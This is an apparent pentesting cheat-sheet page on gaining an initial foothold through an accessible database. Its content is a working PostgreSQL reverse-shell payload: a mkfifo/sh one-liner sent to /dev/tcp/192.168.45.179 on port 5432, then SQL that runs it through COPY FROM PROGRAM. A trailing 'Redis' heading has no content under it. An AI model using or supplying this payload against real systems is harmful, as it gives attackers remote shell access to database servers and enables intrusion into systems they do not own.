Initial Footholdaccessible_databasesOn this pageaccessible_databasesPostgreSQL PostgreSQL Reverse Shell \set rev_shell 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i >& /dev/tcp/192.168.45.179/5432 0>&1 >/tmp/f'DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM :'rev_shell'; Redis